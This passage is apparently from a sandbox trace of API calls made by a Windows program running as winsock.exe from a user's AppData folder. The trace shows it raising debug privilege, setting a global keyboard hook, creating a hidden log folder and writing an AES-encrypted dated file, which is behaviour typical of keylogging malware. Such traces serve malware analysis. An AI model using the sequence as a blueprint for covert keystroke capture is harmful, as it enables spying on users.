lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateClassEnumWmi\x06i\r_+_ «·lHóÊ\x04", lpUsedDefaultChar=0x0) returned 18 [0184.388] GetProcAddress (hModule=0x6c220000, lpProcName="CreateClassEnumWmi") returned 0x6c222065 [0184.389] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ExecQueryWmi", cchWideChar=12, lpMultiByteStr=0x4caf084, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ExecQueryWmiD\x1a\x06i\r_+_ «·lHóÊ\x04", lpUsedDefaultChar=0x0) returned 12 [0184.389] GetProcAddress (hModule=0x6c220000, lpProcName="ExecQueryWmi") returned 0x6c22227b [0184.394] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ExecNotificationQueryWmi", cchWideChar=24, lpMultiByteStr=0x4caf078, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ExecNotificationQueryWmiD\x1a\x06i\r_+_ «·lHóÊ\x04", lpUsedDefaultChar=0x0) returned 24 [0184.394] GetProcAddress (hModule=0x6c220000, lpProcName="ExecNotificationQueryWmi") returned 0x6c222202 [0184.396] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PutInstanceWmi", cchWideChar=14, lpMultiByteStr=0x4caf084, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PutInstanceWmi\x06i\r_+_ «·lHóÊ\x04", lpUsedDefaultChar=0x0) returned 14 [0184.397] GetProcAddress (hModule=0x6c220000, lpProcName="PutInstanceWmi") returned 0x6c22257a [0184.452] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PutClassWmi", cchWideChar=11, lpMultiByteStr=0x4caf084, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PutClassWmi", lpUsedDefaultChar=0x0) returned 11 [0184.452] GetProcAddress (hModule=0x6c220000, lpProcName="PutClassWmi") returned 0x6c2224fa [0184.471] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloneEnumWbemClassObject", cchWideChar=24, lpMultiByteStr=0x4caf078, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloneEnumWbemClassObjectD\x1a\x06i\r_+_ «·lHóÊ\x04", lpUsedDefaultChar=0x0) returned 24 [0184.471] GetProcAddress (hModule=0x6c220000, lpProcName="CloneEnumWbemClassObject") returned 0x6c221f40 [0184.481] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ConnectServerWmi", cchWideChar=16, lpMultiByteStr=0x4caf080, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ConnectServerWmiD\x1a\x06i\r_+_ «·lHóÊ\x04", lpUsedDefaultChar=0x0) returned 16 [0184.482] GetProcAddress (hModule=0x6c220000, lpProcName="ConnectServerWmi") returned 0x6c221fc3 [0184.607] CoCreateInstance (in: rclsid=0x6c221284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x6c2212e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x4caf7a4 | out: ppv=0x4caf7a4*=0x5a7ff8) returned 0x0 [0184.608] WbemLocator:IWbemLocator:ConnectServer (in: This=0x5a7ff8, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x4caf838 | out: ppNamespace=0x4caf838*=0x5904a0) returned 0x0 [0184.751] WbemLocator:IUnknown:QueryInterface (in: This=0x5904a0, riid=0x6c221104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x4caf6d4 | out: ppvObject=0x4caf6d4*=0x5bc17c) returned 0x0 [0184.751] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x5bc17c, pProxy=0x5904a0, pAuthnSvc=0x4caf724, pAuthzSvc=0x4caf720, pServerPrincName=0x4caf718, pAuthnLevel=0x4caf71c, pImpLevel=0x4caf70c, pAuthInfo=0x4caf710, pCapabilites=0x4caf714 | out: pAuthnSvc=0x4caf724*=0xa, pAuthzSvc=0x4caf720*=0x0, pServerPrincName=0x4caf718, pAuthnLevel=0x4caf71c*=0x6, pImpLevel=0x4caf70c*=0x2, pAuthInfo=0x4caf710, pCapabilites=0x4caf714*=0x1) returned 0x0 [0184.751] WbemLocator:IUnknown:Release (This=0x5bc17c) returned 0x1 [0184.752] WbemLocator:IUnknown:QueryInterface (in: This=0x5904a0, riid=0x6c2210f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x4caf6c8 | out: ppvObject=0x4caf6c8*=0x5bc1a0) returned 0x0 [0184.752] WbemLocator:IUnknown:QueryInterface (in: This=0x5904a0, riid=0x6c221104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x4caf6c4 | out: ppvObject=0x4caf6c4*=0x5bc17c) returned 0x0 [0184.752] WbemLocator:IClientSecurity:SetBlanket (This=0x5bc17c, pProxy=0x5904a0, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0184.752] WbemLocator:IUnknown:Release (This=0x5bc17c) returned 0x2 [0184.752] WbemLocator:IUnknown:Release (This=0x5bc1a0) returned 0x1 [0184.752] CoTaskMemFree (pv=0x5bffa8) [0184.814] WbemLocator:IUnknown:Release (This=0x5a7ff8) returned 0x0 [0184.814] WbemLocator:IUnknown:QueryInterface (in: This=0x5904a0, riid=0x6cb86c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x4caf2c4 | out: ppvObject=0x4caf2c4*=0x5bc1a0) returned 0x0 [0184.815] WbemLocator:IUnknown:QueryInterface (in: This=0x5bc1a0, riid=0x6ccbfdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x4caf280 | out: ppvObject=0x4caf280*=0x0) returned 0x80004002 [0184.815] WbemLocator:IUnknown:QueryInterface (in: This=0x5bc1a0, riid=0x6ccbfb20*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x4caf09c | out: ppvObject=0x4caf09c*=0x0) returned 0x80004002 [0184.816] WbemLocator:IUnknown:QueryInterface (in: This=0x5904a0, riid=0x6ccc056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x4caee74 | out: ppvObject=0x4caee74*=0x0) returned 0x80004002 [0184.817] WbemLocator:IUnknown:AddRef (This=0x5bc1a0) returned 0x3 [0184.817] WbemLocator:IUnknown:QueryInterface (in: This=0x5bc1a0, riid=0x6ccc0208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x4caebdc | out: ppvObject=0x4caebdc*=0x0) returned 0x80004002 [0184.817] WbemLocator:IUnknown:QueryInterface (in: This=0x5bc1a0, riid=0x6ccc015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x4caeb8c | out: ppvObject=0x4caeb8c*=0x0) returned 0x80004002 [0184.817] WbemLocator:IUnknown:QueryInterface (in: This=0x5bc1a0, riid=0x6cb940e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x4caeb98 | out: ppvObject=0x4caeb98*=0x5bc0fc) returned 0x0 [0184.817] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x5bc0fc, riid=0x6cb86c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x4caeba0 | out: pCid=0x4caeba0*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0184.817] WbemLocator:IUnknown:Release (This=0x5bc0fc) returned 0x3 [0184.817] CoGetContextToken (in: pToken=0x4caebf8 | out: pToken=0x4caebf8) returned 0x0 [0184.818] CoGetContextToken (in: pToken=0x4caf000 | out: pToken=0x4caf000) returned 0x0 [0184.818] WbemLocator:IUnknown:QueryInterface (in: This=0x5bc1a0, riid=0x6ccc0448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x4caf090 | out: ppvObject=0x4caf090*=0x5bc184) returned 0x0 [0184.818] WbemLocator:IRpcOptions:Query (in: This=0x5bc184, pPrx=0x5bc1a0, dwProperty=2, pdwValue=0x4caf0b8 | out: pdwValue=0x4caf0b8) returned 0x80004002 [0184.818] WbemLocator:IUnknown:Release (This=0x5bc184) returned 0x3 [0184.818] WbemLocator:IUnknown:Release (This=0x5bc1a0) returned 0x2 [0184.819] CoGetContextToken (in: pToken=0x4caf5d8 | out: pToken=0x4caf5d8) returned 0x0 [0184.819] CoGetContextToken (in: pToken=0x4caf538 | out: pToken=0x4caf538) returned 0x0 [0184.819] WbemLocator:IUnknown:QueryInterface (in: This=0x5bc1a0, riid=0x4caf608*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x4caf604 | out: ppvObject=0x4caf604*=0x5904a0) returned 0x0 [0184.819] WbemLocator:IUnknown:AddRef (This=0x5904a0) returned 0x4 [0184.819] WbemLocator:IUnknown:Release (This=0x5904a0) returned 0x3 [0184.819] WbemLocator:IUnknown:Release (This=0x5904a0) returned 0x2 [0184.832] SysStringLen (param_1=0x0) returned 0x0 [0184.832] CoUninitialize () Thread: id = 138 os_tid = 0x123c [0184.860] CoGetContextToken (in: pToken=0x4caf26c | out: pToken=0x4caf26c) returned 0x0 [0184.860] CoGetContextToken (in: pToken=0x4caf25c | out: pToken=0x4caf25c) returned 0x0 [0184.860] CoGetMarshalSizeMax (in: pulSize=0x4caf218, riid=0x6cb86c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnk=0x5bc1a0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0 | out: pulSize=0x4caf218) returned 0x0 [0184.861] CoMarshalInterface (pStm=0x5bac90, riid=0x6cb86c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnk=0x5bc1a0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0) returned 0x0 Thread: id = 141 os_tid = 0x124c Thread: id = 142 os_tid = 0x1250 [0186.905] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0186.905] RoInitialize () returned 0x1 [0186.905] RoUninitialize () returned 0x0 [0186.907] ResetEvent (hEvent=0x3f4) returned 1 Thread: id = 143 os_tid = 0x1254 [0188.147] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0188.147] RoInitialize () returned 0x1 [0188.147] RoUninitialize () returned 0x0 [0193.209] QueryPerformanceCounter (in: lpPerformanceCount=0x518f810 | out: lpPerformanceCount=0x518f810*=3383312452533) returned 1 [0193.272] GetLastInputInfo (in: plii=0x518f808 | out: plii=0x518f808*(cbSize=0x8, dwTime=0x2029c7a)) returned 1 [0198.276] QueryPerformanceCounter (in: lpPerformanceCount=0x518f810 | out: lpPerformanceCount=0x518f810*=3383819148810) returned 1 [0198.276] GetLastInputInfo (in: plii=0x518f808 | out: plii=0x518f808*(cbSize=0x8, dwTime=0x2029c7a)) returned 1 [0203.327] QueryPerformanceCounter (in: lpPerformanceCount=0x518f810 | out: lpPerformanceCount=0x518f810*=3384324240082) returned 1 [0203.327] GetLastInputInfo (in: plii=0x518f808 | out: plii=0x518f808*(cbSize=0x8, dwTime=0x202c3a9)) returned 1 [0209.475] QueryPerformanceCounter (in: lpPerformanceCount=0x518f810 | out: lpPerformanceCount=0x518f810*=3384939058252) returned 1 [0209.475] GetLastInputInfo (in: plii=0x518f808 | out: plii=0x518f808*(cbSize=0x8, dwTime=0x202c3a9)) returned 1 [0214.561] QueryPerformanceCounter (in: lpPerformanceCount=0x518f810 | out: lpPerformanceCount=0x518f810*=3385447593352) returned 1 [0214.561] GetLastInputInfo (in: plii=0x518f808 | out: plii=0x518f808*(cbSize=0x8, dwTime=0x202f354)) returned 1 [0219.626] QueryPerformanceCounter (in: lpPerformanceCount=0x518f810 | out: lpPerformanceCount=0x518f810*=3385954128287) returned 1 [0219.626] GetLastInputInfo (in: plii=0x518f808 | out: plii=0x518f808*(cbSize=0x8, dwTime=0x202f354)) returned 1 Thread: id = 150 os_tid = 0x129c [0189.428] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0189.428] RoInitialize () returned 0x1 [0189.428] RoUninitialize () returned 0x0 [0190.015] GetCurrentProcessId () returned 0x10b4 [0190.063] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x52cef5c | out: lpLuid=0x52cef5c*(LowPart=0x14, HighPart=0)) returned 1 [0190.065] GetCurrentProcess () returned 0xffffffff [0190.065] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x52cef58 | out: TokenHandle=0x52cef58*=0x5d4) returned 1 [0190.066] AdjustTokenPrivileges (in: TokenHandle=0x5d4, DisableAllPrivileges=0, NewState=0x226321c*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0190.066] CloseHandle (hObject=0x5d4) returned 1 [0190.068] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x10b4) returned 0x5d4 [0190.123] EnumProcessModules (in: hProcess=0x5d4, lphModule=0x2263260, cb=0x100, lpcbNeeded=0x52cf6bc | out: lphModule=0x2263260, lpcbNeeded=0x52cf6bc) returned 1 [0190.124] EnumProcessModules (in: hProcess=0x5d4, lphModule=0x226336c, cb=0x200, lpcbNeeded=0x52cf6bc | out: lphModule=0x226336c, lpcbNeeded=0x52cf6bc) returned 1 [0190.126] GetModuleInformation (in: hProcess=0x5d4, hModule=0x400000, lpmodinfo=0x22635ac, cb=0xc | out: lpmodinfo=0x22635ac*(lpBaseOfDll=0x400000, SizeOfImage=0x5e000, EntryPoint=0x0)) returned 1 [0190.127] CoTaskMemAlloc (cb=0x804) returned 0x5c5888 [0190.127] GetModuleBaseNameW (in: hProcess=0x5d4, hModule=0x400000, lpBaseName=0x5c5888, nSize=0x800 | out: lpBaseName="winsock.exe") returned 0xb [0190.128] CoTaskMemFree (pv=0x5c5888) [0190.128] CoTaskMemAlloc (cb=0x804) returned 0x5c5888 [0190.128] GetModuleFileNameExW (in: hProcess=0x5d4, hModule=0x400000, lpFilename=0x5c5888, nSize=0x800 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\SubDir\\winsock.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\subdir\\winsock.exe")) returned 0x38 [0190.129] CoTaskMemFree (pv=0x5c5888) [0190.129] CloseHandle (hObject=0x5d4) returned 1 [0190.208] SetWindowsHookExW (idHook=13, lpfn=0x4690716, hmod=0x400000, dwThreadId=0x0) returned 0x9902a5 [0190.259] QueryUnbiasedInterruptTime (in: UnbiasedTime=0x52cf6c0 | out: UnbiasedTime=0x52cf6c0) returned 1 [0190.317] QueryUnbiasedInterruptTime (in: UnbiasedTime=0x52cf6b0 | out: UnbiasedTime=0x52cf6b0) returned 1 [0190.417] CoTaskMemAlloc (cb=0x20c) returned 0x5f2fe8 [0190.417] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x5f2fe8 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0190.417] CoTaskMemFree (pv=0x5f2fe8) [0190.417] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", nBufferLength=0x105, lpBuffer=0x52cf180, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", lpFilePart=0x0) returned 0x25 [0190.476] CoTaskMemAlloc (cb=0x20c) returned 0x5f2fe8 [0190.476] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x5f2fe8 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0190.476] CoTaskMemFree (pv=0x5f2fe8) [0190.477] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", nBufferLength=0x105, lpBuffer=0x52cf180, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", lpFilePart=0x0) returned 0x25 [0190.477] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Logs", nBufferLength=0x105, lpBuffer=0x52cf21c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Logs", lpFilePart=0x0) returned 0x2a [0190.477] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x52cf6b8) returned 1 [0190.477] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Logs" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\logs"), fInfoLevelId=0x0, lpFileInformation=0x226977c | out: lpFileInformation=0x226977c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0190.477] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x52cf6b4) returned 1 [0190.478] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x52cf624) returned 1 [0190.478] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Logs" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\logs"), fInfoLevelId=0x0, lpFileInformation=0x52cf6a0 | out: lpFileInformation=0x52cf6a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0190.478] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x52cf620) returned 1 [0190.478] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x52cf624) returned 1 [0190.478] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Logs" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\logs"), fInfoLevelId=0x0, lpFileInformation=0x52cf6a0 | out: lpFileInformation=0x52cf6a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0190.478] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x52cf620) returned 1 [0190.479] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x52cf624) returned 1 [0190.479] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming"), fInfoLevelId=0x0, lpFileInformation=0x52cf6a0 | out: lpFileInformation=0x52cf6a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xf684cc15, ftLastAccessTime.dwHighDateTime=0x1d7b451, ftLastWriteTime.dwLowDateTime=0xf684cc15, ftLastWriteTime.dwHighDateTime=0x1d7b451, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0190.479] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x52cf620) returned 1 [0190.541] CreateDirectoryW (lpPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Logs" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\logs"), lpSecurityAttributes=0x0) returned 1 [0190.546] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Logs", nBufferLength=0x105, lpBuffer=0x52cf1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Logs", lpFilePart=0x0) returned 0x2a [0190.546] SetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Logs", dwFileAttributes=0x12) returned 1 [0190.547] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Logs\\09-28-2021", nBufferLength=0x105, lpBuffer=0x52cf224, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Logs\\09-28-2021", lpFilePart=0x0) returned 0x35 [0190.547] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x52cf684) returned 1 [0190.547] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Logs\\09-28-2021" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\logs\\09-28-2021"), fInfoLevelId=0x0, lpFileInformation=0x52cf700 | out: lpFileInformation=0x52cf700*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0190.547] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x52cf680) returned 1 [0190.576] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Logs\\09-28-2021", nBufferLength=0x105, lpBuffer=0x52cf1e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Logs\\09-28-2021", lpFilePart=0x0) returned 0x35 [0190.576] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x52cf648) returned 1 [0190.576] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Logs\\09-28-2021" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\logs\\09-28-2021"), fInfoLevelId=0x0, lpFileInformation=0x52cf6c4 | out: lpFileInformation=0x52cf6c4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0190.577] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x52cf644) returned 1 [0190.577] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Logs\\09-28-2021", nBufferLength=0x105, lpBuffer=0x52cf12c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Logs\\09-28-2021", lpFilePart=0x0) returned 0x35 [0190.577] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x52cf620) returned 1 [0190.577] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Logs\\09-28-2021" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\logs\\09-28-2021"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x5e8 [0191.234] GetFileType (hFile=0x5e8) returned 0x1 [0191.234] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x52cf61c) returned 1 [0191.234] GetFileType (hFile=0x5e8) returned 0x1 [0191.267] CryptAcquireContextW (in: phProv=0x52cf674, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x52cf674*=0x5af5d0) returned 1 [0191.268] CryptImportKey (in: hProv=0x5af5d0, pbData=0x226ab70, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x52cf644 | out: phKey=0x52cf644*=0x610210) returned 1 [0191.268] CryptContextAddRef (hProv=0x5af5d0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0191.268] CryptGenRandom (in: hProv=0x5af5d0, dwLen=0x10, pbBuffer=0x226abd8 | out: pbBuffer=0x226abd8) returned 1 [0191.318] CryptContextAddRef (hProv=0x5af5d0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0191.318] CryptDuplicateKey (in: hKey=0x610210, pdwReserved=0x0, dwFlags=0x0, phKey=0x52cf634 | out: phKey=0x52cf634*=0x610190) returned 1 [0191.318] CryptContextAddRef (hProv=0x5af5d0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0191.318] CryptSetKeyParam (hKey=0x610190, dwParam=0x4, pbData=0x226b2b4*=0x1, dwFlags=0x0) returned 1 [0191.318] CryptSetKeyParam (hKey=0x610190, dwParam=0x1, pbData=0x226b280, dwFlags=0x0) returned 1 [0191.319] CryptEncrypt (in: hKey=0x610190, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x226b440*, pdwDataLen=0x52cf66c*=0xa0, dwBufLen=0xa0 | out: pbData=0x226b440*, pdwDataLen=0x52cf66c*=0xa0) returned 1 [0191.319] CryptEncrypt (in: hKey=0x610190, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x226b504*, pdwDataLen=0x52cf68c*=0x10, dwBufLen=0x10 | out: pbData=0x226b504*, pdwDataLen=0x52cf68c*=0x10) returned 1 [0191.319] CryptEncrypt (in: hKey=0x610190, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x226b538*, pdwDataLen=0x52cf694*=0x0, dwBufLen=0x10 | out: pbData=0x226b538*, pdwDataLen=0x52cf694*=0x10) returned 1 [0191.320] CryptDestroyKey (hKey=0x610210) returned 1 [0191.320] CryptReleaseContext (hProv=0x5af5d0, dwFlags=0x0) returned 1 [0191.320] CryptReleaseContext (hProv=0x5af5d0, dwFlags=0x0) 